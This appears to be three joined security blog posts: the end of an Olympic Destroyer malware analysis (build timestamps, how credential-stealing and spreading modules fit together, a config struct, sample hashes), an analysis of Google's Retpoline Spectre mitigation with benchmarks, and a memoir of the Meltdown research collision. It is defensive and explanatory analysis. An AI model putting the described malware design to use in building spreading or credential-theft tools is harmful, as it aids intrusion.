The samples in question are: 1942f14326f8ffa3afc83946ba9ec06abe983a211939f0e58362f85dd2a6b96a 25089ec24167f3caa413a9e1965c7dfc661219f45305187070a1e360b03f869c 6d7d35b4ce45fae4a048f7e371f23d1edc4c3b6998ab49febfd7d33f13b030a5 9085926d0beacc97f65c86c207fa31183c5373e9a26fb0678fbcd26ab65d6e64 90c956e8983116359662f8b82ae156b378d3fae02c07a18827b4c65f0b5fe9ef It is likely that there are more samples out there which give a better picture of the way Olympic Destroyer wormed itself through the ATOS

network.

PE TIMESTAMPS

As the blog article of Kasperky has already shown, the author(s) of Olympic Destroyer had quite the fun in planting false flags. So, the compilation time stamps of the PE files should be taken with a grain of salt, as they can be easily forged. Nonetheless they provide an interesting picture. Simple version of Olympic Destroyer, PE time stamps ordered ascending:

Name

Compilation Time Stamp

Description

Resource 104

2016-06-28 18:43:09

Copy of PsExec

Resource 105

2017-12-27 09:03:48

Destroyer

DLL in Resource 101

2017-12-27 11:44:17

Browser Password Stealer

DLL in Resource 102

2017-12-27 11:44:21

Windows Account Password Stealer

Resource 101

2017-12-27 11:44:30

Loader for internal DLL

Resource 103

2017-12-27 11:44:35

Loader for internal x64 DLL

Resource 102

2017-12-27 11:44:40

Loader for internal DLL

Main binary

2017-12-27 11:44:47

Olympic Destroyer

(Note that I did not extract the time stamp for the DLL in the resource of resource 103) The PE time stamps of the more complex version in ascending order:

Name

Compilation Time Stamp

Description

Resource 104

2016-06-28 18:43:09

Copy of PsExec

Resource 105

2017-12-27 09:03:48

Destroyer

DLL in Resource 101

2017-12-27 11:38:53

Browser Password Stealer

DLL in Resource 102

2017-12-27 11:38:58

Windows Account Password Stealer

Resource 101

2017-12-27 11:39:06

Loader for internal DLL

Resource 103

2017-12-27 11:39:11

Loader for internal x64 DLL

Resource 102

2017-12-27 11:39:17

Loader for internal DLL

Main binary

2017-12-27 11:39:22

Olympic Destroyer

Some of those values actually make sense, although they might have been crafted in order to do so. The DLLs which are resources of resource 101 and 102 have to be compiled before they can be embedded as resources, so their time stamps come first. The same goes for all resource which are embedded in them main binary of Olympic Destroyer. PsExec in resource 104 is the original copy of PsExec, thus has the original time stamp. A time difference of four to nine seconds for each binary sounds realistic, given only a few dependencies on external libraries. Unfortunately, the compilation with the biggest external dependencies, the DLL in resource 101 where SQLite is used, seems to be the first binary in the build chain. This is where I would have expected to see the biggest gaps in between the time stamps. But as it is the start of the build chain, we cannot compare it to any binary built before it. By looking at the gaps, we can also see that everything except the destroyer part seem to be compiled in one block. Also the more complex version of Olympic Destroyer seems to be compiled five minutes before the simpler version. Most probably the attacker(s) just compiled the first set of Olympic Destroyer, before commenting out the one function using PsExec (implicitly removing all the used sub-functions), and then recompiled the whole set. It is noteworthy to point out that both versions of Olympic Destroyer use the very same copy of the destroyer component. Not only the compilation time stamps are the same, but also their hash sums.

SUMMARY

This article has shown the innermost working of the malware called Olympic Destroyer. We have seen that by pure reverse engineering of the malware samples, a plethora of information can be obtained and

deduced.

The analysis indicates that Olympic Destroyer consists of two completely independent parts: The first one is a framework for network spreading using resource 101 to 104 in order to spread as fast and as far as possible in the local network. The second one is the destructive component. Both parts work completely independent from each other. Resource 101 to 103 have a strong logical dependency on the main binary by receiving the decryption key as well as the name of the named pipe as arguments. And the main binary depends on the information returned from the resources 101 to 103 formatted in a certain way. In contrast to that, the destroyer in resource 105 is only dropped and executed in a fire and forget manor. No arguments, return values or status codes are exchanged. So I think it is correct to state that everything except the destroyer is merely a vehicle in form of a spreading framework to deliver a payload. And the delivered payload is the destroyer. In theory every other payload could be delivered by simply exchanging the resource

105.

We have also seen that Olympic Destroyer comes in two different versions, which have been spread in two different networks. The spreading algorithm differs in the way that credentials stolen on one system are not carried on to the next infected system in one version. It is unknown to me why the differences exist. Reading the Kasperky article indicates that the attackers already had a strong foothold in the _g18.internal_ and _Pyeongchang2018.com_ network. So it might have been enough to spread only one hop from the initial infected machine. This decision could also be influenced by the defensive mechanisms employed at the targeted network. A proper network monitoring tool should mark the execution of PsExec as red flag, which might have been the reason to remove this part of the spreading

algorithm.

The analysis of stolen credentials in the network of _ATOS_ indicates that the attackers had a weaker foothold in the network, since, juding by the samples I looked at, only two sets of credentials were stolen on the initial infection (compared to 44 in the simpler variant). All other credentials were added during the spreading in the network. This weak foothold might have been the cause to go with a more aggressive spreading algorithm.

APPENDIX

Config structure as used in Olympic Destroyer:

> _struct config_

> _{_

> _DWORD credentialsVectorStart;_ > _DWORD credentialsVectorEnd;_ > _DWORD credentialsVectorMaxSize;_ > _CRITICAL_SECTION critSect;_ > _WSADATA wsadata;_ > _char ressourceHpath;_ > _char randomTempPath;_ > _char ressourceIpath;_ > _char selfModulePath;_ > _char domainName;_ > _char accountName;_ > _char domainAndAccountName;_

> _char v13;_

> _DWORD bitness;_ > _DWORD bVersionGreaterEqualVista;_ > _DWORD bVersionSmallerEqualXP;_ > _DWORD bHasSelfDebugPrivs;_ > _DWORD bIsServiceOrAdmin;_ > _DWORD bIsUserAccount;_

> _};_

Hashes used for analysis: > _edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9_ > _01e640a91d32230cd3f45e1594177393415585dbeba9ddbd31be2139935058d3_ > _137148fe8223bc88661ac941ea1a648ad0fb6e49c359acd06781abd0a0493c01_ > _1942f14326f8ffa3afc83946ba9ec06abe983a211939f0e58362f85dd2a6b96a_ > _2239d109d7c01682c99a721d654643b7d8f4431887ecad6fb2d043dbdacfe226_ > _25089ec24167f3caa413a9e1965c7dfc661219f45305187070a1e360b03f869c_ > _254fbeb13f8d2dc36de3a3ffca653608d1b3420a20a20248d330500785b3945c_ > _2bcbb1c165a6e31e085306224de3410249df50742ca3af069d58c7fd75d2d8c4_ > _2bf9f3703b48bf1578a43479444107b33ff6ecea108b364fc73913a639c511d4_ > _2c28f3b297a990b9d7a7163bac57ab68228c66109bb7a593702e556cdd455cce_ > _3131a8208dc7441bf26592d7fed2ba5d9f9994e21d9b8396b4d2cda76a8a44d7_ > _36a65a47cc464aac45a5d27372ea3b3584726d354f0792b9a77bfbe0cd0558bd_ > _41a6d6f1dca75abc924960ee701b0df0e7adc8b7501ac4e2c00743d7266df7d3_ > _5181fe760f456719b0ec505370df0b38055a5a3b202e1d50948fc92383a61c18_ > _569fbe4f66fa09fb375fb87915da79dbafb1ef62d9a20849d1beea4eadb8e805_ > _5d85fba3ff021b35bfba30d5d56b957ef084d818778ff77550bcf65755aa7849_ > _5f37829988e827f05b42774db94e8a15e87e9de12e61b89c91bf5fddee90650c_ > _6d7d35b4ce45fae4a048f7e371f23d1edc4c3b6998ab49febfd7d33f13b030a5_ > _6f6e9dde888d2368c1c9973769a5ea76bbf634105ed4f8adf1e74624f39454ad_ > _725efe161b8d0024cd330e3a3da194b46d16be14d57392fbfdf1ea71415d67b1_ > _75fa1309be8fdca4a6df345a009b47938503d5227149838334581b08d40b7e2f_ > _9085926d0beacc97f65c86c207fa31183c5373e9a26fb0678fbcd26ab65d6e64_ > _90c956e8983116359662f8b82ae156b378d3fae02c07a18827b4c65f0b5fe9ef_ > _98d4f0e8f91d7f4f1a3058b1a30220e3460cc821be704acfcb7fa2eb0c88818c_ > _99ca9d41c2ea6a18436fbc173ce8f3e94b5a3d592d9e4fa978120d140d96aefa_ > _a9f66d9dd3fd0f977381e83c1379fe664f22ebdd5695258fc388465cd3749562_ > _af33d399d9cb8026d796daf95f5bda9da96bb021ad93c001a21aa38005f2faa7_ > _b30b4acf05898c8a6338f5df6c3df7d7f06df8e67ccd773ffd83b5b8acff4cb8_ > _bdfb1a9f59be657b5375689b357ef8e70e1e7332f52c2e79ab3be796e06858d1_ > _ca8be57bbd2f3169d0c1c4b5145e8f955ea69ddde701f94a2b29c661389b3aa2_ > _cc2b47bffc260d992c602dbdbce1fb2ed982df883956cad9beac1ee0784650f6_ > _d17d32048aae06ec60b693cd83e1cf184e8c2e4d1f0299a28423fdc624f56bb8_ > _d2e43c41acd40324813d51df99fa127b86d8e384671dcc77f748d86afc3993a5_ > _e2153c73ec9fd15dc8389523515a96c3477fce5503be78ff82ab3cc7e9386e83_ > _e4dd30d5d85c4aaf05e01d8f40fb0e01e4e8ba99e82ec58946c045ce53783bde_ > _e8349cfcc422310c259688b0226cb14f5196a6daad77b622405282aeac89ab06_ > _f99610f8e36eb65e75979ef3ea4b7382bfb0bf2b72191cefccaaa19283d23606_ Author Robert Michel Posted on March 28, 2018

analysis

IN DEBT TO RETPOLINE Appendix was added on the 14th of Febuary 2018, in response to comments made to me on twitter. In this connection “retpoline pause lfence” and “retpoline ud2” was added to the table. Other than that only typos where fixed since original post.

ABSTRACT

In this blog post I explore the Retpoline mitigation that Paul Turner of Google suggested for the Spectre indirect branch variant issue . A short differential side channel analysis is made along with a performance analysis. The impact of the use of a pause instruction in retpoline is discussed. Finally I consider the technical debt leveraged on CPU developers of a widely deployed retpoline. HOW DOES RETPOLINE WORK This section follows the google presentation of retpoline closely . I included it because it provides the context for the remainder of this blog post. A jmp rax is turned into the following code: * call set_up_target; * capture_spec: * pause;

* jmp capture_spec

* set_up_target:

* mov ,rax

* ret;

call set_up_target (1) pushes the address of capture_spec(2) to the return stack buffer (RSB, cpu internal buffer used to predict returns). It also pushes the address of capture_spec(2) to the program stack and transfers control to set_up_target (5). The mov ,rax overwrites the return stack address on the program stack, so that any subsequent returns will pop the stack and return to the original target in its architectural path. The speculative path of the return remains the value from the RSB and thus the CPU will speculatively execute the code starting at (2). The pause instruction is meant to relinquish pipeline resources to co-located hyperthreads and save power if no co-located hyperthreads are present. The jmp in line 4 continues to repeat the pause until the speculative execution is rolled back when the ret in line 7 finished executing. In simple terms this means the speculative path will resolve to a spinlock thus not leak any information through a side channel. The architectural path will eventually resolve correctly and the program will run as it is supposed to. SIDE CHANNEL ANALYSIS OF RETPOLINE Retpoline’s architectural side channels consist of flushing an entry in the RSB caused by the call in line (1). This information is unlikely to bring an attacker much advantage and would require an attack to have a sufficient amount of control of the RSB. The 6th line makes a store access on the stack. This is visible through a cache side channel to an attacker — provided the attack has sufficient control. However, it is unlikely to provide much information given that the stack is usually used by the functions themselves. It is worth noting that any information this side channel can provide is also provided by the jmp rax (6). Presumably retpoline’s stack access provides slightly less information to an attacker than the original jmp rax instruction – i.e. BTB indexing bits vs. cache set indexing bits. The 7th line is more tricky: if the CPU updates the BTB after a misprediction, the BTB side channel will be similar useful to the original jmp rax. I think it is likely that the BTB is not updated until retirement, so that this side channel isn’t present. Since the pause instruction (line 3) is a CPU hint, the CPU may choose to take or ignore the hint at its discretion – more on this below. Thus, pause may or may not provide a side channel. If external power is plugged in and the hint is taken one can see a co-located hyperthread speed up (see ), which is the purpose of having the pause instruction here, but certainly a side channel as well. If the CPU is running in power saving mode (e.g. unplugged laptop), pausing provides a side channel since executing a pause instruction on two co-located hardware threads causes a delay for both, presumably through C-State interaction. See. In sum, I think the side channels provided by retpoline is less valuable than the side channel provided by the original indirect branch (but is still present). PERFORMANCE ANALYSIS OF RETPOLINE A jmp rax instruction takes about 4 clock cycles to execute and predicts correctly very often. It is replaced in retpoline with a ret instruction which will always mispredict and thus executes far slower. However, unlike doing hard serialization once the ret instruction has been executed out-of-order, the CPU seems to be able to continue without a pipeline flush and thus allowing out-of-order execution to continue. This creates two corner cases: firstly, where dependencies block out-of-order execution across the indirect branch, and secondly, when there is no dependence across the indirect branch. I managed to create a sequence of instructions where retpoline was just as fast as the original unpredicted branch – this is the case when the instructions after the branch depend on the results of the instructions before the branch. Obviously, any co-located hyperthread will be more affected by the retpoline than a predicted indirect branch, but the thread itself does not lose any cycles. At first this seems weird, but imagine completely dependant ALU integer instructions on both sides of the indirect branch – with the branch unit being completely free, both retpoline and the indirect branch will execute concurrently with the integer ALU instructions before the branch. Since the integer ALU instructions after the branch are dependant of those before the branch, they only get scheduled for execution once all prior instructions have been executed. Thus, retpoline and an indirect branch perform equally. In the case of no dependencies across the indirect branch, retpoline is slower. Retpoline will not allow the out-of-order execution to continue until the ret instruction is executed and consequently adding a penalty compared to a predicted indirect branch. In general, the longer it takes for the indirect branch to resolve, the higher the penalty of retpoline is. There is also an indirect performance cost of retpoline which – in my opinion – is likely to be somewhat smaller. The call in line 1 will push a return address onto the RSB (and consequently may evict the oldest entry in the RSB), and thus potentially causing an RSB underflow once a previous call returns. A RSB underflow will manifest itself as a negative performance impact if the evicted RSB entry causes mispredictions or stalls in unrelated code later on. For this to happen a call stack is required to be deeper than the the size of the RSB. The stall penalty of the underflow was big enough to cause Intel to add prediction to the microarchitecture (for Broadwell and Skylake). If this prediction was as efficient as using the RSB, the RSB would not exist. The following table presents the results of my micro benchmarking:

Unit Clock cycles

Mean

Std.dev

Median

jmp rsi

350.33

95.48

346 retpoline pause

410.64 65,94

410 retpoline lfence

403.76 25,96

404 retpoline clean

402.13 19,99

402

retpoline pause lfence

406.74 64,76

404 retpoline ud2

404,29

28,70

402

The “retpoline clean” is without the pause instruction, “retpoline lfence” is where pause has been replaced with a lfence instruction. The results are generally not very stable over multiple runs but with all three versions of retpoline often ending up with an average of around 400-410 cycles and the indirect branch being around 50 clks faster on average. Thus, some additional care should be taken

before concluding

that “retpoline pause” is slower than the others. I ran the tests with 100k observations and removed the slowest 10% observations in a primitive noise reduction approach. The microbenchmark is for a bad case with no dependency across the indirect branch for integer instructions (add rsi,1, add rbx, 1 respectively) and is run on a Intel i7-6700k. While microbenchmarking is important for the arguments I will put forth in this text, it is important to note that they are not reflective on the system’s performance as the incidence of indirect branches is relatively small and this benchmark is manufactured to portrait cases which are worse than in normal scenarios. Also, the microbenchmarking completely ignores any indirect

effects.

THE WEIRD CASE OF PAUSE It immediately seemed weird to me to have the pause instruction in the spinlock in line 3 of retpoline. Usually we have pause instructions in spinlocks, but spinlocks execute architecturally at some point. Having a pause of 10 clock cycles for Broadwell and 100 for Skylake in the spinlock potentially causes the CPU to pause the architectural flow that needs to be done before the return instruction can be executed. This may lead to a larger-than-necessary penalty to the spinlock. However, pause is not actually an instruction. It is a hint to the CPU and my guess is that the hint is not taken. I ran retpoline on my Broadwell and my Skylake and compared the penalty: there was almost no difference. This is important because we would expect the different implementation of pause to give different average latencies if it was actually executed (10 clk vs 100 clk). Another argument for pause not being executed speculatively is that pausing is connected to a VmExit. I can only guess why Intel made it is possible to get a VmExit on pause instruction. I think the most compelling reason would be to use the pause used by spinlock in a guest to process small work items in the hypervisor instead of just idling the CPU. This would probably also help virtualizing hardware. If I am right about this, it would be sensible for the pause hint actually pause only on retirement instead of pausing the CPU speculatively. Another argument is power management: the behavior of the pause instruction depends on the C-State of a co-located hyperthread. Presumably this gives us one of the two side channels as described in a previous section. There is little reason on why a CPU designer would pause a thread which is executing other instructions out-of-order. DISCUSSION OF TECHNICAL DEBT OF RETPOLINE As clever as retpoline seems, I think it is fundamentally broken. Not because it does not work but instead because it builds a large amount of technical debt. Adding retpoline to a piece of software would require CPU designers to make sure that legacy software is compatible with new CPUs. If a company like Google applies retpoline in their instructure it is fairly unproblematic, Google has a nice inventory of software running on their systems and they can make sure that software applied to new CPUs is recompiled and consequently this poses no constraints on a CPU designer. However, if we add retpoline to a compiler we can be sure it will be added to all kinds of software including virtual machines, containers, specialized software etc. These pieces of software often do not remain supported, they are poorly catalogued and consequently, if the behavior of retpoline changes significantly, these systems may perform suboptimal, be unsafe or even completely break. This effectively ties the hands of CPU designers as they strive to improve the CPU in the future. The first concrete problem I see is the use of the pause hint: regardless of whether the pause hint is taken in retpoline or not, its non-intended use in retpoline ties the behavior of this instruction down for CPU designers in future generations of CPUs. It is worth noting here that we have at least 3 different implementations of the pause hint in different CPUs already (treated as nop, stall 10 clks, stall 100 clks). Adding to that the complexity of the instruction I outlined above, it would be fair to assume that this instruction might need changes in future generations of CPUs. Thus, having the pause hint in retpoline in scattered over software everywhere might turn out to be a bad idea thinking long term. The good news here is that there probably is a good solution for this. Replacing the pause instruction with lfence will serialize the speculative path and probably even stop it from looping; effectively stopping the execution of the spinlock may free up resources for co-located hyperthread as well as branch execution units for the main thread that otherwise would have been tied up by the jmp instruction in line 4. I ran some test on Skylake and found very near identical performance results for pause and lfence, suggesting that this is viable solution. It is important to note that the lfence instruction was previously documented to only serialize loads. But instead it silently serialized all instructions — which is now the documented behavior since Intel published their errata documents for the Spectre/Meltdown patches . So, the mortgage on lfence is small and has already been signed. The second concrete problem I see is the construct which repoline uses to direct speculative execution into the spinlock is a much bigger problem. On Skylake, return instructions predict by using the indirect branch predictor, requiring Skylake to be handled differently than other CPUs. The problem is twofold: on the one hand, the very common ret instruction needs to be replaced with retpoline (or other non-speculative branching), and on the other hand, the hardware interrupt raised in line 6 may underflow the RSB in the interrupt handler. Thus, repoline is already potentially unsafe on some CPUs (in my opinion much less than without retpolinie though). The technical debt here is that retpoline may be completely unsafe if future CPUs stop relying on the RSB for return prediction. There may be many reasons for a CPU designer to change this. For example a completely unified system for indirect branches or prediction of monotonic returns (returns with only one return address). The latter will keep the RSB save from non-monotonic returns if the RSB underflows and thus may perform better when there are deep call stacks. I do not know whether these things are good ideas, but retpoline might effectively rule them out. Also, one could imagine conflicts with future CPU-based control-flow integrity systems, etc. One could argue that performance optimization rely on microarchitecture details all the time, but there is an important difference between breaking a performance optimization and a security patch. Already we see problems with updating broken libraries amongst software vendors, it’s not difficult to imagine what would happen if a secure software becomes insecure because of CPU evolution. Instead of taking on technical debt potentially forever, I suggest we use either a less secure option (i.e. lfence ahead of indirect branches) or a more expensive option such as IPBP or replacing indirect calls with iret (which is documented to be serializing). That constitutes a high price now, but avoids paying rent on technical debts in perpetuity.

CONCLUSION

Retpoline is an effective mitigation for Spectre variants which rely on causing misprediction on indirect branches on some CPUs. From a pure side channel perspective retpoline adds a different side channel but it is an improvement over the side channel of a traditional indirect branch nonetheless. Retpoline’s performance penalty is complex, but likely smaller than the penalty of the serializing alternatives. However, as Retpoline relies on assumptions about the underlying microarchitecture, it adds technical debt if used widely. If Google, Microsoft or whoever with software-deployment management wants to use it, they have my blessing but there is reasons for scepticism if it is a good idea to have it in general purpose compilers. CPU Vendor’s short term marketing deficits should not lead us to trade small short term performance gains causing technical debt to be paid back with interest in the future for a more complex

microarchitecture.

APPENDIX ADDED 14TH OF FEBUARY 2018 Stephen Checkoway of University of Illinois at Chicago commented that it might be worth testing an ud2 instruction in the speculative executed spinlock. I find this idea promising because ud2 essentially just throws an “invalid opcode” exception and thus abusing it for retpoline is likely to produce equivalent performance to that of lfence, perhaps even better, Further, it’s unlikely that using this instruction is associated with any technical debt. The simple test result here shows that the direct performance impact is approximately similar (see table above) that of the other versions of the spinlock. Some implemented versions of retpoline uses a pause followed by an lfence instruction. I added this to the performance table as well. Thanks to Khun Selom & @ed_maste (twitter account).

LITERATURE

Turner, Paul. “Retpoline”. https://support.google.com/faqs/answer/7625886 Fogh, Anders. “Two covert channels”. https://cyber.wtf/2016/08/01/two-covert-channels/ Fogh, Anders “Covert Shotgun”. https://cyber.wtf/2016/09/27/covert-shotgun/ Intel, “Intel® 64 and IA-32 Architectures Software Developer

Manual: Vol 3”

.https://www.intel.com/content/www/us/en/architecture-and-technology/64-ia-32-architectures-software-developer-system-programming-manual-325384.html Intel. Intel® 64 and IA-32 Architectures Optimization Reference

Manual. July 2017.

https://software.intel.com/sites/default/files/managed/9e/bc/64-ia-32-architectures-optimization-manual.pdf Evtyushkin, Dmitry, Dmitry Ponomarev, and Nael Abu-Ghazaleh. “Jump over ASLR: Attacking branch predictors to bypass ASLR.” Microarchitecture (MICRO), 2016 49th Annual IEEE/ACM International Symposium on. IEEE, 2016. Intel, “Speculative Execution and Indirect Branch Prediction Side Channel Analysis Method”, https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00088&languageid=en-fr Author Anders Fogh Posted on February 13, 2018February 14, 2018

Categories meta

BEHIND THE SCENES OF A BUG COLLISION

Introduction

In this blog post I’ll speculate as to how we ended up with multiple researchers arriving at the same vulnerabilities in modern CPU’s concurrently. The conclusion is that the bug was ripe because of a years long build up of knowledge about CPU security, carried out by many research groups. I’ll also detail the rough story behind the research that let me to the bug. My story is probably different than that of the other researchers, but while unique, I am relatively sure that it’s the same for all researchers on most security issues: security research is a long haul thing. The remainder of this blog post is semi-technical. WHY DID WE GET A BUG COLLISION ON SPECTRE/MELTDOWN? This is of course my take on the event, my personal story, which I’ll detail below. Research collision in CPU research isn’t that uncommon. In fact, the story of my friendship with Daniel Gruss is about a series of collisions. In 2015 I was preparing a talk about row hammer for Black Hat with Nishat Herath when Daniel tweeted that he was able to flip bits from Javascript. I didn’t want to have questions I couldn’t answer, so I started researching it and literally the evening before Daniel published how he was doing it, I knew how he did it. Later Daniel teased me about detecting cache side channels if there were no L3 cache misses. I replied ‘are you timing Clflush?’ He was indeed. You’ll find me being acknowledged in the paper for this reason . I told him he shouldn’t worry about me competing on publishing it, because I was doing research on a side channel in the row buffer and didn’t have time to compete on Clflush. Turns out he and the wu cache clan were too. I blogged it, and wu cache clan wrote a paper on it in Pessl et al. . You’ll find me acknowledged here as well. Not long after that, I did a blog post on breaking KASLR with the prefetch instruction. Obviously, Daniel was doing the exact same thing again. We had enough of competition and started my by now a regular collaboration with the WU cache clan after that point. So why do things like this happen? (Granted, the story about Daniel is a freaky one.) Well, CPU research is much like drawing a map of an uncharted world. Researchers start from known research and proceed into the unknown, and if they find something, they document it and add it to the map. This essentially means that the frontier looks very similar to everybody leading people into the same paths. This processed is very much sustained by the fact that almost all research in this area is academic and academia is much better organized in terms of recording and documenting than hackers. For a thing like meltdown, the real foundation was laid with the work on cache side channels sometime back around 2005. There are many papers from this time, I’ll mention Percival because it’s my favorite. Another milestone paper was Yuval Yarom’s paper on Flush+reload . Note that Yuval is also partial to the Spectre paper. With this foundation, a subgenre of papers emerged in 2013 with Hund, Willems & Holz . They essentially noticed that when an unprivileged user tries to read kernel mode memory, the CPU actually does a great part of the read process before making an error, allowing a user to observe not the data of the kernel, but the layout of the kernel – this is known as a KASLR break and is important for classical exploits. This work was followed up with improvements including Gruss et al and Yang et al . Both papers showed that a lot more work was being done by the CPU than was strictly needed when an unprivileged user accesses kernel memory – an important prerequisite for Meltdown to exist. Also in 2016, another KASLR break using branches from Evtuishkin et al. emerged. They didn’t try to read from the kernel but rather found that branch prediction leaked information. This is important because branch prediction is a precursor for speculative execution and thus build a bridge towards Meltdown. Felix Wilhelm extended Evtuishkin et al. to extend to hypervisors which are likely to be important in the rationale for hypervisors being affected. In fact, I think Jann Horn mentioned this blog post as an inspiration. There where other works, like that of Enrique Nissim which showed that the KASLR breaks real-world applications with a classic exploit. Also in 2016, some work was being done on side channels in the pipeline. My Covert Shotgun blog post is an example of this literature. To sum it up, by the end of 2016 it was known that unprivileged reads from user mode to kernel mode did more processing than was strictly required, it was known that branches were important, and there was work going on examining the pipeline. In end effect, the Meltdown bug was surrounded on all sides. It was a single blind spot on the map – obviously, nobody knew that there’d actually be a bug in this blind spot and I think most did not believe such as bug existed. Other people would probably pick other papers and there where many. My point remains: a lot of people moved towards this find over a very long period of time. THE PERSONAL PERSPECTIVE I work for GDATA Advanced Analytics and there I work in an environment that is very friendly and supportive of research. Without research, a consultant company like ours cannot provide excellence for their customers. However, CPU bugs don’t pay the bills, so my day job does not have much to do with this. I spend my time helping customers with their security problems: malware analysis, digital forensics, and incident response being the main tasks that I do on a day to day basis. This means that the bulk of the work I do on CPUs is done in my spare time after hours. So my story with Meltdown and Spectre starts essentially at Black Hat 2016 where Daniel Gruss and I presented our work on the prefetch instruction. The video of our talk can be found here . As described above, this work slowly gave me this fuzzy feeling that maybe this work is just the tip of the iceberg. In fact did a blog post about the meta’s on breaking KASLR in October 2016 and presented it at RuhrSec 2017 , so I was very well acquainted with that literature. Meanwhile, I wanted to get away from working with caches and accidentally found some covert channels and wrote about them. I thought there might be more and started picking apart the pipeline in search of covert channels. My frustration led me to automate finding covert channels which resulted in this blog post and later this talk at HackPra . In the talk, you can hear that I’m still frustrated “I don’t care, I’ll just use a shotgun”. To this day I have many unanswered questions about the

pipeline..

Later that year I met up with the WU Cache Clan at CCS where we were presenting the academic version of the prefetch KASLR break. We had some beer-fueled conversations. The conversations were added upon at Black Hat Europe (Michael Schwarz and I did a talk on the row buffer side channel we’d done concurrent work on) where I started believing that meltdown might be possible, but yet without a clue as to how it could possibly work. I finally made the connection to speculative execution on December 2016/January 2017 when I prepared the presentation for HackPra about Covert Shotgun. There are a lot of slides about speculative execution. At first, I didn’t think about reading kernel memory. My first “attack” was just another attack on KASLR. Essentially it was Hund, Willems, Holz in a speculative version- the work never really got finished (timing inside of speculative execution is possible, but not easy – I did not find a solution to this problem until much later) the rationale for doing this work is that it would solve a problem with their method and do this stuff in my spare time – fun is essential and this sounded like fun. So my project name for Meltdown was “undead KASLR”, despite me quickly figuring out there was bigger fish to be fried. I told my friend Halvar Flake about the weird ideas while presenting at IT-Defense in February and his encouragement was a big part of me actually continuing, because I didn’t believe it would work. In March, I had the first chance to do some real work on the project during a small get away from work to present Jacob Torrey’s and my work on PUFs (the work was really mostly Jacobs – and not related to Meltdown per se) at Troopers 17. I researched mornings in the hotel and even did some research during other people’s talks. Fun fact: there is s a video of me doing a spectre-style attack POC on the code I’d added to Alex Ionescu’s wonderful Simplevisor. Hi Alex! I’m the bald head seen to the lower left of the center isle doing weird head movements and packing away my laptop as I succeeded at around 19 minutes into the video. The second half of the talk was pretty awesome

btw!!

Later in March 2017, I visited Daniel, Michael, and Clementine Maurice in Graz to work on a common project we had on detecting double fetch bugs with a cache attack (which became this paper . Here I tried to pitch my idea, because with the workload I had I knew it would be difficult for me to realize alone. Unfortunately, I wasn’t the only one fully booked out and Daniel, Michael and myself were super skeptical at that time, despite the slight encouragement I’d had at Troopers. So we decided to finish the stuff we were already doing first. Might I add here that Daniel and Michael did some really cool stuff since then? Struggling with work and making a sufficient contribution to the double fetch paper the project was on ice. The main reason why my name is so far back on the paper is that I didn’t have time to pull my weight. After Troopers, I didn’t get much done and was really frustrated about it. So in July, I started back up again in the evenings. It helped me immensely that my climbing partner suffered an injury giving me a bit more time. This time around I was working targeted at Meltdown. I were doing stuff much too complicated at first and wasted a lot of time on that. Then I tried to simple things up as much as I could and this is why I ended up with a negative result. I wrote up the blog on company time on a Friday before noon before leaving early on a vacation. Luca Ebach helped proof read it. If he hadn’t it would’ve been unreadable and Tomasulo would’ve been spelled wrong.. The “Pandoras box” part of the blog post is a reference to the limited and unfinished stuff I did on “Spectre”, which I was sure would work at the time, but needed checking before I’d commit to blogging about it. While on vacation, I decided to wrap things up in an academic paper and with some positive results in my hands, seek help from some academic professionals. So I have continued my research afterward, after all you don’t open Pandora’s box without looking what is inside. In light of recent events, I shall not be publishing the rest of the stuff I did. The stuff that Jann Horn did, is really really awesome, the same goes for the Spectre/Meltdown papers. It is wonderful to see that I was barking up the right tree. It is important to me to mention that Jann Horn reported his research prior to my blog post and did not have access to mine prior to that date.

LITERATURE

Gruss, Daniel, et al. “Flush+ Flush: a fast and stealthy cache attack.” Detection of Intrusions and Malware, and Vulnerability Assessment. Springer International Publishing, 2016. 279-299. Nishat Herath, Anders Fogh. “These Are Not Your Grand Daddy’s CPU Performance Counters” Black Hat 2015, https://www.youtube.com/watch?v=dfIoKgw65I0 Pessl, Peter, et al. “DRAMA: Exploiting DRAM Addressing for Cross-CPU Attacks.” USENIX Security Symposium. 2016. Percival, Colin. “Cache missing for fun and profit.” (2005). Yarom, Yuval, and Katrina Falkner. “FLUSH+ RELOAD: A High Resolution, Low Noise, L3 Cache Side-Channel Attack.” USENIX Security Symposium. 2014. Hund, Ralf, Carsten Willems, and Thorsten Holz. “Practical timing side-channel attacks against kernel space ASLR.” Security and Privacy (SP), 2013 IEEE Symposium on. IEEE, 2013. Gruss, Daniel, et al. “Prefetch side-channel attacks: Bypassing SMAP and kernel ASLR.” Proceedings of the 2016 ACM SIGSAC Conference on Computer and Communications Security. ACM, 2016. Jang, Yeongjin, Sangho Lee, and Taesoo Kim. “Breaking kernel address space layout randomization with intel tsx.” Proceedings of the 2016 ACM SIGSAC Conference on Computer and Communications Security. ACM, 2016. Evtyushkin, Dmitry, Dmitry Ponomarev, and Nael Abu-Ghazaleh. “Jump over ASLR: Attacking branch predictors to bypass ASLR.” Microarchitecture (MICRO), 2016 49th Annual IEEE/ACM International Symposium on. IEEE, 2016. Wilhelm, Felx. “Mario Baslr”, https://github.com/felixwilhelm/mario_baslr Nissim, Enrique. “I Know Where Your Page Lives: De-randomizing the Windows 10 Kernel”. https://www.youtube.com/watch?v=WbAv2q9znok Fogh, Anders. “Covert Shotgun”, https://cyber.wtf/2016/09/27/covert-shotgun/ Fogh, Anders, Gruss, Daniel. “Using Undocumented CPU Behavior to See Into Kernel Mode and Break KASLR in the Process” Black Hat

2016.

Fogh, Anders, “Micro architecture attacks on KASLR”,https://cyber.wtf/?s=kaslr Fogh, Anders. “Micro architecture attacks on KASLR and More”, https://www.youtube.com/watch?v=LyiB1jlUdN8 Fogh, Anders, “Two covert channels”, https://cyber.wtf/2016/08/01/two-covert-channels/ [17[ Fogh, Anders, “Covert Shotgun”, https://www.youtube.com/watch?v=oVmPQCT5VkY&t=34s, Hack Pra 2017 Schwarz, Michael, Fogh, Anders. “Drama: how your DRAM becomes a security problem”. Black Hat Europe 2016 https://www.youtube.com/watch?v=lSU6YzjIIiQ Ionescu, Alex, “SimpleVisor” https://github.com/ionescu 007/

“

Neilson, Graeme, “Vox Ex Machina”, Troopers 17. https://www.youtube.com/watch?v=Xrlp_uNBlSs&t=1145s Schwarz, Michael, et al. “Automated Detection, Exploitation, and Elimination of Double-Fetch Bugs using Modern CPU Features.” arXiv preprint arXiv:1711.01254 (2017). Fogh, Anders. “Negative result: reading kernel memory from user

mode”

